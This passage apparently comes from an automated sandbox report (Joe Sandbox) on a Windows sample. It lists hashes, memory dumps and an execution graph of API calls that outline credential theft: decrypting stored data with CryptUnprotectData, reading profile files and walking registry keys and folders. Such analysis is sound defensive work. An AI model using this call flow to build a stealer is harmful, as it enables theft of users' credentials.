                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: PathFileExistsA.SHLWAPI ref: 00007FF780B6FFAC
                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: OpenFile.KERNEL32 ref: 00007FF780B6FFC5
                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: GetFileSize.KERNEL32 ref: 00007FF780B6FFE5
                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: CreateFileMappingA.KERNEL32 ref: 00007FF780B7001C
                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: MapViewOfFile.KERNEL32 ref: 00007FF780B7003D
                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: __memcpy.DELAYIMP ref: 00007FF780B7004F
                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: UnmapViewOfFile.KERNEL32 ref: 00007FF780B7005A
                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: CloseHandle.KERNEL32 ref: 00007FF780B70063
                                                                                                                                                                  • Part of subcall function 00007FF780B6FF38: CloseHandle.KERNEL32 ref: 00007FF780B7006C
                                                                                                                                                                  • Part of subcall function 00007FF780B6F27C: __memcpy.DELAYIMP ref: 00007FF780B6F29A
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: GetProcessHeap.KERNEL32 ref: 00007FF780B625C1
                                                                                                                                                                  • Part of subcall function 00007FF780B625B4: HeapFree.KERNEL32 ref: 00007FF780B625CF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.3877023422.00007FF780B61000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF780B60000, based on PE: true
                                                                                                                                                                • Associated: 00000009.00000002.3876945716.00007FF780B60000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877071718.00007FF780B71000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877158920.00007FF780B74000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000009.00000002.3877198277.00007FF780B75000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_9_2_7ff780b60000_354F.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
                                                                                                                                                                • String ID: APPDATA
                                                                                                                                                                • API String ID: 2395011915-4054820676
                                                                                                                                                                • Opcode ID: 1c5aadbc771fdada102cf90f1d560a23c7010e43b89a1500ae84cb532174cc29
                                                                                                                                                                • Instruction ID: d058919f0e1308bae7fe91b8f0c24055b402c0b39545ca16d492dd49dafeba77
                                                                                                                                                                • Opcode Fuzzy Hash: 1c5aadbc771fdada102cf90f1d560a23c7010e43b89a1500ae84cb532174cc29
                                                                                                                                                                • Instruction Fuzzy Hash: 9A118126628A4395EB20EB14E8445EDB760FB84784FD04031EA5E87B99EF3CE509CB10

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:3.6%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:50.4%
                                                                                                                                                                Signature Coverage:3.2%
                                                                                                                                                                Total number of Nodes:786
                                                                                                                                                                Total number of Limit Nodes:87
                                                                                                                                                                execution_graph 28581 c834ca 57 API calls 28582 c35cc5 22 API calls 28583 c36eb7 22 API calls 28585 c45cca 32 API calls 28688 c5faca _allmul strcspn 28590 c670de 24 API calls 28693 c5c6da 23 API calls 28456 c39ee8 28457 c39ef1 RtlFreeHeap 28456->28457 28458 c39f1a 28456->28458 28457->28458 28459 c39f02 28457->28459 28461 c37f70 17 API calls 28459->28461 28461->28458 28593 c3f4ec 20 API calls 28594 c513ca 89 API calls 28695 c69ef6 114 API calls 28595 c34cf5 memset 28537 c328f8 28538 c32900 28537->28538 28539 c32ac8 28537->28539 28569 c31000 GetProcessHeap RtlAllocateHeap 28538->28569 28541 c83848 76 API calls 28539->28541 28543 c32ad1 DeleteFileW 28541->28543 28542 c3290e 28570 c502ec 94 API calls 28542->28570 28545 c31011 3 API calls 28543->28545 28546 c32adf 28545->28546 28548 c32a98 lstrlen 28549 c32ac1 28548->28549 28550 c32aa4 28548->28550 28552 c31011 3 API calls 28549->28552 28575 c31798 lstrlen 28550->28575 28552->28539 28553 c32ab1 28576 c31798 lstrlen 28553->28576 28555 c32ab9 28577 c31798 lstrlen 28555->28577 28557 c31fa7 19 API calls 28563 c32919 28557->28563 28558 c329da lstrlen 28559 c329eb lstrlen 28558->28559 28558->28563 28559->28563 28562 c32a8b 28574 c4fb92 93 API calls 28562->28574 28563->28557 28563->28558 28563->28562 28571 c31000 GetProcessHeap RtlAllocateHeap 28563->28571 28572 c32112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28563->28572 28573 c502ec 94 API calls 28563->28573 28565 c32a25 wsprintfA lstrlen 28566 c32a6a lstrcat 28565->28566 28567 c32a58 28565->28567 28568 c31011 3 API calls 28566->28568 28567->28566 28568->28563 28569->28542 28570->28563 28571->28563 28572->28565 28573->28563 28574->28548 28575->28553 28576->28555 28577->28549 28696 c513ca 88 API calls 28697 c40284 39 API calls 28597 c7348f 27 API calls 28702 c5069d _allmul 28603 c72c9e 105 API calls 28703 c3629a 23 API calls 28190 c33098 28191 c31b6a 2 API calls 28190->28191 28193 c330af 28191->28193 28192 c333a9 28193->28192 28214 c31000 GetProcessHeap RtlAllocateHeap 28193->28214 28195 c330ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28196 c84bec 89 API calls 28195->28196 28199 c33126 28196->28199 28197 c3339b DeleteFileW 28198 c31011 3 API calls 28197->28198 28198->28192 28199->28197 28200 c33392 28199->28200 28215 c502ec 94 API calls 28199->28215 28202 c83848 76 API calls 28200->28202 28202->28197 28203 c33381 28218 c4fb92 93 API calls 28203->28218 28206 c332cd CryptUnprotectData 28213 c33155 28206->28213 28207 c3319c RtlCompareMemory 28207->28206 28207->28213 28208 c331d0 RtlZeroMemory 28216 c31000 GetProcessHeap RtlAllocateHeap 28208->28216 28210 c31fa7 19 API calls 28210->28213 28211 c31798 lstrlen 28211->28213 28212 c31011 3 API calls 28212->28213 28213->28203 28213->28206 28213->28207 28213->28208 28213->28210 28213->28211 28213->28212 28217 c502ec 94 API calls 28213->28217 28214->28195 28215->28213 28216->28213 28217->28213 28218->28200 28705 c46698 30 API calls 28707 c356a2 _allrem 28604 c4b8a6 90 API calls 28430 c39ea7 RtlAllocateHeap 28431 c39ec1 28430->28431 28432 c39ed9 28430->28432 28434 c37f70 17 API calls 28431->28434 28434->28432 28435 c32ea5 25 API calls 28436 c324a4 28439 c32198 RtlZeroMemory GetVersionExW 28436->28439 28440 c321cb LoadLibraryW 28439->28440 28442 c3249b 28440->28442 28443 c321fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28440->28443 28444 c32492 FreeLibrary 28443->28444 28449 c32244 28443->28449 28444->28442 28445 c3247b 28445->28444 28446 c322e1 RtlCompareMemory 28446->28449 28447 c32365 RtlCompareMemory 28447->28449 28448 c31953 6 API calls 28448->28449 28449->28444 28449->28445 28449->28446 28449->28447 28449->28448 28450 c31011 GetProcessHeap RtlFreeHeap VirtualQuery 28449->28450 28451 c323f8 StrStrIW 28449->28451 28452 c317c0 9 API calls 28449->28452 28450->28449 28451->28449 28452->28449 28605 c4b0aa 84 API calls 28606 c348b1 22 API calls 28607 c36eb7 24 API calls 28490 c32cb5 28491 c32cbe 28490->28491 28492 c31953 6 API calls 28491->28492 28493 c32cc3 28492->28493 28494 c32e17 28493->28494 28495 c31953 6 API calls 28493->28495 28496 c32cd9 28495->28496 28519 c31000 GetProcessHeap RtlAllocateHeap 28496->28519 28498 c32ce9 28520 c31000 GetProcessHeap RtlAllocateHeap 28498->28520 28500 c32cf9 28501 c31b6a 2 API calls 28500->28501 28502 c32d04 28501->28502 28503 c32d0c GetPrivateProfileSectionNamesW 28502->28503 28509 c32ded 28502->28509 28503->28509 28517 c32d22 28503->28517 28504 c31011 3 API calls 28505 c32e02 28504->28505 28506 c31011 3 API calls 28505->28506 28507 c32e09 28506->28507 28510 c31011 3 API calls 28507->28510 28508 c32d3f StrStrIW 28511 c32d53 GetPrivateProfileStringW 28508->28511 28512 c32dd7 lstrlenW 28508->28512 28509->28504 28513 c32e10 28510->28513 28511->28512 28514 c32d72 GetPrivateProfileIntW 28511->28514 28512->28509 28512->28517 28515 c31011 3 API calls 28513->28515 28514->28517 28515->28494 28516 c31953 6 API calls 28516->28517 28517->28508 28517->28509 28517->28512 28517->28516 28518 c31011 3 API calls 28517->28518 28518->28517 28519->28498 28520->28500 28712 c513ca 89 API calls 28608 c513ca 87 API calls 28609 c478b9 33 API calls 28713 c512bb _allmul _allmul _allmul _alldvrm _allmul 28714 c396bc _alldiv _alldiv _alldiv _alldiv _allmul 27721 c33c40 27757 c31b6a 27721->27757 27723 c33c50 27724 c33dfa 27723->27724 27763 c31000 GetProcessHeap RtlAllocateHeap 27723->27763 27726 c33c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27764 c84bec 27726->27764 27728 c33dec DeleteFileW 27775 c31011 27728->27775 27730 c33c9a 27730->27728 27731 c33de3 27730->27731 27780 c31000 GetProcessHeap RtlAllocateHeap 27730->27780 27788 c83848 27731->27788 27734 c33cce 27781 c502ec 94 API calls 27734->27781 27736 c33da8 27784 c4fb92 93 API calls 27736->27784 27738 c33db1 lstrlen 27739 c33db9 27738->27739 27740 c33ddc 27738->27740 27785 c31798 lstrlen 27739->27785 27741 c31011 3 API calls 27740->27741 27741->27731 27742 c31fa7 19 API calls 27749 c33cd9 27742->27749 27744 c33dc8 27786 c31798 lstrlen 27744->27786 27746 c33d2b lstrlen 27748 c33d35 lstrlen 27746->27748 27746->27749 27747 c33dd2 27787 c31798 lstrlen 27747->27787 27748->27749 27749->27736 27749->27742 27749->27746 27782 c31000 GetProcessHeap RtlAllocateHeap 27749->27782 27783 c502ec 94 API calls 27749->27783 27753 c33d46 wsprintfA lstrlen 27754 c33d83 lstrcat 27753->27754 27755 c33d71 27753->27755 27756 c31011 3 API calls 27754->27756 27755->27754 27756->27749 27758 c31b99 27757->27758 27759 c31b6f 27757->27759 27758->27723 27759->27758 27760 c31b76 CreateFileW 27759->27760 27761 c31b95 27760->27761 27762 c31b8d CloseHandle 27760->27762 27761->27723 27762->27761 27763->27726 27791 c8307c 27764->27791 27766 c84c01 27767 c84c44 27766->27767 27801 c4c54d memset 27766->27801 27767->27730 27769 c84c18 27802 c4c871 21 API calls 27769->27802 27771 c84c2a 27803 c4c518 19 API calls 27771->27803 27773 c84c33 27773->27767 27804 c8486f 89 API calls 27773->27804 27826 c31162 VirtualQuery 27775->27826 27778 c3102d 27778->27724 27779 c3101d GetProcessHeap RtlFreeHeap 27779->27778 27780->27734 27781->27749 27782->27753 27783->27749 27784->27738 27785->27744 27786->27747 27787->27740 27828 c837cb 27788->27828 27792 c83095 27791->27792 27795 c8308e 27791->27795 27793 c830ad 27792->27793 27818 c366ce 17 API calls 27792->27818 27793->27795 27796 c830ed memset 27793->27796 27795->27766 27797 c83108 27796->27797 27800 c83116 27797->27800 27819 c3c59d 17 API calls 27797->27819 27800->27795 27805 c36512 27800->27805 27801->27769 27802->27771 27803->27773 27804->27767 27820 c3685c 27805->27820 27807 c3651d 27807->27795 27808 c36519 27808->27807 27809 c3bfec GetSystemInfo 27808->27809 27823 c365bd 27809->27823 27811 c3c00e 27812 c365bd 16 API calls 27811->27812 27813 c3c01a 27812->27813 27814 c365bd 16 API calls 27813->27814 27815 c3c026 27814->27815 27816 c365bd 16 API calls 27815->27816 27817 c3c032 27816->27817 27817->27795 27818->27793 27819->27800 27821 c8307c 17 API calls 27820->27821 27822 c36861 27821->27822 27822->27808 27824 c8307c 17 API calls 27823->27824 27825 c365c2 27824->27825 27825->27811 27827 c31019 27826->27827 27827->27778 27827->27779 27829 c837d6 27828->27829 27831 c837e9 27828->27831 27840 c395b5 17 API calls 27829->27840 27831->27728 27832 c837db 27833 c837df 27832->27833 27836 c837eb 27832->27836 27841 c84da0 17 API calls 27833->27841 27835 c83834 27843 c83865 71 API calls 27835->27843 27836->27835 27838 c8381f 27836->27838 27842 c38795 22 API calls 27838->27842 27840->27832 27841->27831 27842->27831 27843->27831 28610 c34440 24 API calls 28611 c56440 94 API calls 28716 c99238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28718 c513ca 102 API calls 28613 c77452 19 API calls 28719 c35e5a 28 API calls 28379 c3105d VirtualFree 28615 c72864 25 API calls 28723 c63e6b 20 API calls 28617 c4f86a 31 API calls 28618 c34c6d 17 API calls 28623 c8507d 24 API calls 28726 c50670 _allmul _allmul _allmul _alldvrm 28624 c4807c 23 API calls 28625 c3b079 20 API calls 28728 c3ca01 _allmul _alldiv _allmul _alldiv 27844 c34406 27849 c32e30 StrStrIW 27844->27849 27847 c32e30 22 API calls 27848 c3443a 27847->27848 27850 c32e57 27849->27850 27856 c32ebc 27849->27856 27886 c319e5 27850->27886 27853 c32ed0 RegOpenKeyExW 27854 c32f68 27853->27854 27870 c32eee 27853->27870 27858 c31011 3 API calls 27854->27858 27875 c31000 GetProcessHeap RtlAllocateHeap 27856->27875 27857 c32f50 RegEnumKeyExW 27860 c32f5e RegCloseKey 27857->27860 27857->27870 27861 c32f6f 27858->27861 27860->27854 27861->27847 27862 c32e75 27863 c32eb5 27862->27863 27901 c31afe 27862->27901 27865 c31011 3 API calls 27863->27865 27865->27856 27869 c32e91 27873 c31011 3 API calls 27869->27873 27870->27857 27872 c32e30 18 API calls 27870->27872 27874 c31011 3 API calls 27870->27874 27876 c31953 27870->27876 27881 c3199d 27870->27881 27871 c3199d 9 API calls 27871->27869 27872->27870 27873->27863 27874->27870 27875->27853 27877 c31964 lstrlenW lstrlenW 27876->27877 27909 c31000 GetProcessHeap RtlAllocateHeap 27877->27909 27880 c31986 lstrcatW lstrcatW 27880->27870 27882 c31953 6 API calls 27881->27882 27883 c319a6 27882->27883 27884 c31011 3 API calls 27883->27884 27885 c319af 27884->27885 27885->27870 27887 c319f7 27886->27887 27888 c319fa RegOpenKeyExW 27886->27888 27887->27888 27889 c31aa2 27888->27889 27890 c31a28 RegQueryValueExW 27888->27890 27891 c31ab9 27889->27891 27894 c319e5 5 API calls 27889->27894 27892 c31a46 27890->27892 27893 c31a94 RegCloseKey 27890->27893 27891->27856 27900 c31bc5 10 API calls 27891->27900 27892->27893 27910 c31000 GetProcessHeap RtlAllocateHeap 27892->27910 27893->27889 27893->27891 27894->27891 27896 c31a61 RegQueryValueExW 27897 c31a8b 27896->27897 27898 c31a7f 27896->27898 27899 c31011 3 API calls 27897->27899 27898->27893 27899->27898 27900->27862 27911 c31000 GetProcessHeap RtlAllocateHeap 27901->27911 27903 c31b0d SHGetFolderPathW 27904 c31b20 27903->27904 27905 c31b63 27903->27905 27906 c31011 3 API calls 27904->27906 27905->27869 27905->27871 27908 c31b28 27906->27908 27907 c319e5 9 API calls 27907->27908 27908->27905 27908->27907 27909->27880 27910->27896 27911->27903 28631 c69000 28 API calls 28632 c75401 memset memcpy memcpy memset memcpy 28729 c50e0c 22 API calls 28051 c3a40e 28053 c3a426 28051->28053 28061 c3a4a2 28051->28061 28052 c3a4cc ReadFile 28055 c3a524 28052->28055 28052->28061 28054 c3a469 memcpy 28053->28054 28056 c3a44a memcpy 28053->28056 28053->28061 28054->28061 28065 c3a2aa 17 API calls 28055->28065 28058 c3a45d 28056->28058 28059 c3a532 28059->28058 28060 c3a53e memset 28059->28060 28060->28058 28061->28052 28061->28055 28062 c3a501 28061->28062 28064 c3a1c6 18 API calls 28062->28064 28064->28058 28065->28059 28732 c5f21c 23 API calls 28635 c3581f _alldiv _allrem _allmul 28636 c6e024 93 API calls 28638 c3482b 14 API calls 28639 c5742e 24 API calls 28641 c57c28 8 API calls 28462 c3f433 28463 c3f445 28462->28463 28468 c423b9 28463->28468 28465 c3f47c 28467 c3f490 28465->28467 28476 c3e206 58 API calls 28465->28476 28469 c423d3 28468->28469 28474 c42473 28468->28474 28472 c42431 28469->28472 28480 c43451 43 API calls 28469->28480 28471 c4240f 28471->28472 28481 c4235a 17 API calls 28471->28481 28472->28474 28477 c363f7 28472->28477 28474->28465 28476->28467 28479 c3bafc 20 API calls 28477->28479 28478 c36400 28478->28474 28479->28478 28480->28471 28481->28472 28645 c4943d 34 API calls 28646 c83dc8 24 API calls 28739 c673c4 22 API calls 28044 c39fc8 28046 c39fd8 28044->28046 28047 c39fd3 28044->28047 28045 c39ff4 HeapCreate 28045->28047 28048 c3a004 28045->28048 28046->28045 28046->28047 28050 c37f70 17 API calls 28048->28050 28050->28047 28742 c513ca 89 API calls 28171 c343d9 28178 c34317 _alloca_probe RegOpenKeyW 28171->28178 28174 c34317 25 API calls 28175 c343f5 28174->28175 28176 c34317 25 API calls 28175->28176 28177 c34403 28176->28177 28179 c34343 RegEnumKeyExW 28178->28179 28180 c343cf 28178->28180 28181 c343c4 RegCloseKey 28179->28181 28185 c3436d 28179->28185 28180->28174 28181->28180 28182 c31953 6 API calls 28182->28185 28183 c3199d 9 API calls 28183->28185 28185->28182 28185->28183 28186 c31011 3 API calls 28185->28186 28189 c3418a 16 API calls 28185->28189 28187 c3439b RegEnumKeyExW 28186->28187 28187->28185 28188 c343c3 28187->28188 28188->28181 28189->28185 28745 c3ebd9 37 API calls 28380 c315dd 28381 c315f3 lstrlen 28380->28381 28382 c31600 28380->28382 28381->28382 28391 c31000 GetProcessHeap RtlAllocateHeap 28382->28391 28384 c31608 lstrcat 28385 c31644 28384->28385 28386 c3163d lstrcat 28384->28386 28392 c31333 28385->28392 28386->28385 28389 c31011 3 API calls 28390 c31667 28389->28390 28391->28384 28415 c31000 GetProcessHeap RtlAllocateHeap 28392->28415 28394 c31357 28416 c3106c lstrlen MultiByteToWideChar 28394->28416 28396 c31366 28417 c312a3 RtlZeroMemory 28396->28417 28399 c313b8 RtlZeroMemory 28403 c313ed 28399->28403 28400 c31011 3 API calls 28401 c315d2 28400->28401 28401->28389 28402 c315b5 28402->28400 28403->28402 28419 c31000 GetProcessHeap RtlAllocateHeap 28403->28419 28405 c314a7 wsprintfW 28407 c314c9 28405->28407 28406 c315a1 28408 c31011 3 API calls 28406->28408 28407->28406 28420 c31000 GetProcessHeap RtlAllocateHeap 28407->28420 28408->28402 28410 c31533 28411 c3159a 28410->28411 28421 c3104c VirtualAlloc 28410->28421 28412 c31011 3 API calls 28411->28412 28412->28406 28414 c3158a RtlMoveMemory 28414->28411 28415->28394 28416->28396 28418 c312c5 28417->28418 28418->28399 28418->28402 28419->28405 28420->28410 28421->28414 28422 c363dd 28424 c3b87b 21 API calls 28422->28424 28423 c363f4 28424->28423 28649 c399e1 strncmp 28650 c855eb IsProcessorFeaturePresent 28747 c57be1 29 API calls 28653 c3c9ea _allmul _alldiv 28654 c349f1 13 API calls 28655 c3d1f7 memset _allmul _allmul 28748 c49ff0 32 API calls 28749 c513ca 72 API calls 28521 c347fa 28528 c3479c 28521->28528 28524 c3479c 23 API calls 28525 c34813 28524->28525 28526 c3479c 23 API calls 28525->28526 28527 c3481f 28526->28527 28529 c31afe 10 API calls 28528->28529 28530 c347af 28529->28530 28531 c347f1 28530->28531 28532 c3199d 9 API calls 28530->28532 28531->28524 28536 c347bf 28532->28536 28533 c347ea 28534 c31011 3 API calls 28533->28534 28534->28531 28535 c31d4a 18 API calls 28535->28536 28536->28533 28536->28535 28656 c57d8b _allrem memcpy 28755 c4ab8b 19 API calls 28756 c513ca 88 API calls 28658 c4fd97 19 API calls 28758 c4cb91 18 API calls 28759 c3bf9a _alldiv 28659 c31198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28219 c3639e 28223 c3b1e3 28219->28223 28243 c3b1e5 28219->28243 28220 c363b2 28224 c3b1e5 28223->28224 28225 c3b214 28224->28225 28279 c3aeea 28224->28279 28227 c3b233 28225->28227 28229 c3b28f 28225->28229 28297 c3ae65 28225->28297 28227->28229 28263 c3a7ae 28227->28263 28229->28220 28231 c3b26d 28303 c3a1c6 18 API calls 28231->28303 28232 c3b2d6 28276 c36a5a 28232->28276 28238 c3b310 CreateFileMappingW 28239 c3b32b MapViewOfFile 28238->28239 28240 c3b37e 28238->28240 28239->28240 28241 c3b2e8 28239->28241 28304 c3a1c6 18 API calls 28240->28304 28241->28229 28241->28238 28244 c3b214 28243->28244 28245 c3b20d 28243->28245 28247 c3b233 28244->28247 28248 c3ae65 22 API calls 28244->28248 28249 c3b28f 28244->28249 28246 c3aeea 27 API calls 28245->28246 28246->28244 28247->28249 28250 c3a7ae 18 API calls 28247->28250 28248->28247 28249->28220 28253 c3b267 28250->28253 28251 c3b26d 28377 c3a1c6 18 API calls 28251->28377 28252 c3b2d6 28254 c36a5a 17 API calls 28252->28254 28253->28249 28253->28251 28253->28252 28256 c3a67c 22 API calls 28253->28256 28261 c3b2e8 28254->28261 28257 c3b2be 28256->28257 28257->28251 28257->28252 28258 c3b310 CreateFileMappingW 28259 c3b32b MapViewOfFile 28258->28259 28260 c3b37e 28258->28260 28259->28260 28259->28261 28378 c3a1c6 18 API calls 28260->28378 28261->28249 28261->28258 28265 c3a7c7 28263->28265 28264 c3a805 28264->28229 28264->28231 28264->28232 28267 c3a67c 28264->28267 28265->28264 28305 c3a1c6 18 API calls 28265->28305 28268 c3a6c1 28267->28268 28269 c3a694 _alldiv _allmul 28267->28269 28306 c3a33b SetFilePointer 28268->28306 28269->28268 28272 c3a6f0 SetEndOfFile 28273 c3a6d4 28272->28273 28275 c3a6ee 28272->28275 28273->28275 28310 c3a1c6 18 API calls 28273->28310 28275->28231 28275->28232 28277 c8307c 17 API calls 28276->28277 28278 c36a65 28277->28278 28278->28241 28312 c36a81 28279->28312 28281 c3af01 28282 c36a81 memset 28281->28282 28296 c3af07 28281->28296 28283 c3af2a 28282->28283 28283->28296 28316 c37f07 28283->28316 28285 c3af54 28285->28296 28319 c852ae 28285->28319 28289 c3affa 28290 c3b020 28289->28290 28291 c3b000 28289->28291 28292 c3ae65 22 API calls 28290->28292 28343 c3a1c6 18 API calls 28291->28343 28294 c3b01c 28292->28294 28294->28296 28338 c3adcc 28294->28338 28296->28225 28298 c3ae7a 28297->28298 28299 c3a67c 22 API calls 28298->28299 28300 c3ae83 28298->28300 28301 c3aea5 28299->28301 28300->28227 28301->28300 28376 c3a1c6 18 API calls 28301->28376 28303->28229 28304->28229 28305->28264 28307 c3a390 28306->28307 28308 c3a36a 28306->28308 28307->28272 28307->28273 28308->28307 28311 c3a1c6 18 API calls 28308->28311 28310->28275 28311->28307 28313 c36a8f 28312->28313 28314 c36a95 memset 28313->28314 28315 c36aa4 28313->28315 28314->28315 28315->28281 28344 c37ec7 28316->28344 28320 c852bb 28319->28320 28321 c3afd9 28320->28321 28349 c6ba08 _allmul 28320->28349 28323 c3b87b 28321->28323 28324 c3b88d memset 28323->28324 28328 c3b8e5 28324->28328 28327 c3ba3c 28327->28289 28328->28324 28328->28327 28329 c3b965 CreateFileW 28328->28329 28332 c3ba14 28328->28332 28334 c3ba41 28328->28334 28350 c3b609 28328->28350 28353 c3b64b 18 API calls 28328->28353 28354 c3bb9f 18 API calls 28328->28354 28355 c3a2aa 17 API calls 28328->28355 28329->28328 28356 c3a1c6 18 API calls 28332->28356 28337 c852ae _allmul 28334->28337 28335 c3ba32 28357 c84db2 17 API calls 28335->28357 28337->28327 28342 c3ade4 28338->28342 28339 c3ae5f 28339->28296 28342->28339 28362 c3bafc 28342->28362 28373 c3a39e 18 API calls 28342->28373 28343->28294 28345 c37ed4 28344->28345 28346 c37ed9 28344->28346 28345->28285 28348 c36e6a 17 API calls 28346->28348 28348->28345 28349->28321 28358 c3a08a 28350->28358 28352 c3b60f 28352->28328 28353->28328 28354->28328 28355->28328 28356->28335 28357->28327 28359 c3a0a4 28358->28359 28360 c36a81 memset 28359->28360 28361 c3a0aa 28359->28361 28360->28361 28361->28352 28363 c3b609 memset 28362->28363 28364 c3bb14 28363->28364 28365 c3bb3f GetFileAttributesW 28364->28365 28367 c3bb25 DeleteFileW 28364->28367 28368 c3bb5b 28364->28368 28372 c3bb1a 28364->28372 28365->28364 28366 c3bb4b 28365->28366 28366->28368 28369 c3bb7d 28366->28369 28367->28364 28367->28369 28374 c3a1c6 18 API calls 28368->28374 28375 c3a2aa 17 API calls 28369->28375 28372->28342 28373->28342 28374->28372 28375->28372 28376->28300 28377->28249 28378->28249 28425 c31b9d 28426 c31ba2 28425->28426 28427 c31bc1 28425->28427 28426->28427 28428 c31ba9 GetFileAttributesW 28426->28428 28429 c31bb5 28428->28429 28760 c58ba6 7 API calls 28660 c411a0 43 API calls 28761 c753ad memset memcpy memset memcpy 28762 c733b7 27 API calls 28663 c59dbc 25 API calls 28763 c513ca 89 API calls 28665 c5e141 18 API calls 28765 c56340 92 API calls 28766 c4f74d 18 API calls 28666 c3a558 18 API calls 28667 c5e558 22 API calls 28769 c57f67 24 API calls 28770 c67762 memset memset memcpy 28669 c65d6f 20 API calls 28670 c4a16f 33 API calls 28772 c3ab68 22 API calls 28485 c32f77 28486 c32e30 22 API calls 28485->28486 28487 c32f9a 28486->28487 28488 c32e30 22 API calls 28487->28488 28489 c32fab 28488->28489 28673 c4c97b memcpy 28775 c66f06 24 API calls 27912 c34108 27915 c34045 27912->27915 27934 c33fdc 27915->27934 27918 c33fdc 50 API calls 27919 c3407a 27918->27919 27920 c33fdc 50 API calls 27919->27920 27921 c3408d 27920->27921 27922 c33fdc 50 API calls 27921->27922 27923 c340a0 27922->27923 27924 c33fdc 50 API calls 27923->27924 27925 c340b3 27924->27925 27926 c33fdc 50 API calls 27925->27926 27927 c340c6 27926->27927 27928 c33fdc 50 API calls 27927->27928 27929 c340d9 27928->27929 27930 c33fdc 50 API calls 27929->27930 27931 c340ec 27930->27931 27932 c33fdc 50 API calls 27931->27932 27933 c340ff 27932->27933 27935 c31afe 10 API calls 27934->27935 27937 c33fea 27935->27937 27936 c3403f 27936->27918 27937->27936 27938 c3199d 9 API calls 27937->27938 27939 c33ff8 27938->27939 27945 c33ed9 27939->27945 27943 c34038 27944 c31011 3 API calls 27943->27944 27944->27936 27946 c33fd1 27945->27946 27947 c33eed 27945->27947 27946->27943 27967 c31d4a 27946->27967 27947->27946 27995 c31000 GetProcessHeap RtlAllocateHeap 27947->27995 27949 c33f01 PathCombineW FindFirstFileW 27950 c33fca 27949->27950 27956 c33f27 27949->27956 27953 c31011 3 API calls 27950->27953 27951 c33f32 lstrcmpiW 27954 c33f42 lstrcmpiW 27951->27954 27955 c33faf FindNextFileW 27951->27955 27952 c33f78 lstrcmpiW 27952->27955 27952->27956 27953->27946 27954->27955 27958 c33f56 27954->27958 27955->27956 27957 c33fc3 FindClose 27955->27957 27956->27951 27956->27952 27996 c31000 GetProcessHeap RtlAllocateHeap 27956->27996 27957->27950 28013 c31000 GetProcessHeap RtlAllocateHeap 27958->28013 27961 c33f92 PathCombineW 27997 c33e04 27961->27997 27962 c33f60 PathCombineW 27964 c33ed9 23 API calls 27962->27964 27965 c33f76 27964->27965 27966 c31011 3 API calls 27965->27966 27966->27955 27968 c31d62 27967->27968 27969 c31eb4 27967->27969 27968->27969 28039 c319b4 27968->28039 27969->27943 27972 c31d8b 27974 c31953 6 API calls 27972->27974 27973 c31d79 27975 c31953 6 API calls 27973->27975 27976 c31d83 27974->27976 27975->27976 27976->27969 27977 c31da3 FindFirstFileW 27976->27977 27978 c31ead 27977->27978 27985 c31dba 27977->27985 27979 c31011 3 API calls 27978->27979 27979->27969 27980 c31dc5 lstrcmpiW 27982 c31e8e FindNextFileW 27980->27982 27983 c31ddd lstrcmpiW 27980->27983 27981 c31953 6 API calls 27981->27985 27984 c31ea2 FindClose 27982->27984 27982->27985 27983->27982 27992 c31df5 27983->27992 27984->27978 27985->27980 27985->27981 27986 c3199d 9 API calls 27985->27986 27988 c31e54 lstrcmpiW 27986->27988 27987 c319b4 lstrlenW 27987->27992 27988->27992 27990 c31011 3 API calls 27990->27982 27991 c31953 6 API calls 27991->27992 27992->27987 27992->27990 27992->27991 27993 c3199d 9 API calls 27992->27993 27994 c31d4a 12 API calls 27992->27994 28043 c31cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27992->28043 27993->27992 27994->27992 27995->27949 27996->27961 27998 c31b6a 2 API calls 27997->27998 27999 c33e0f 27998->27999 28008 c33ec7 27999->28008 28014 c31c31 CreateFileW 27999->28014 28006 c33ebf 28007 c31011 3 API calls 28006->28007 28007->28008 28008->27965 28009 c33ea8 28012 c31011 3 API calls 28009->28012 28010 c33e6c RtlCompareMemory 28010->28009 28011 c33e7e CryptUnprotectData 28010->28011 28011->28009 28012->28006 28013->27962 28015 c31c53 GetFileSize 28014->28015 28016 c31c98 28014->28016 28017 c31c63 28015->28017 28018 c31c90 CloseHandle 28015->28018 28016->28008 28024 c32fb1 28016->28024 28036 c31000 GetProcessHeap RtlAllocateHeap 28017->28036 28018->28016 28020 c31c6b ReadFile 28021 c31c80 28020->28021 28021->28018 28022 c31011 3 API calls 28021->28022 28023 c31c8e 28022->28023 28023->28018 28025 c32ff2 28024->28025 28026 c32fb8 StrStrIA 28024->28026 28025->28008 28030 c3123b lstrlen 28025->28030 28026->28025 28027 c32fcd lstrlen StrStrIA 28026->28027 28027->28025 28028 c32fe7 28027->28028 28037 c3190b 6 API calls 28028->28037 28031 c31256 CryptStringToBinaryA 28030->28031 28032 c3129b 28030->28032 28031->28032 28033 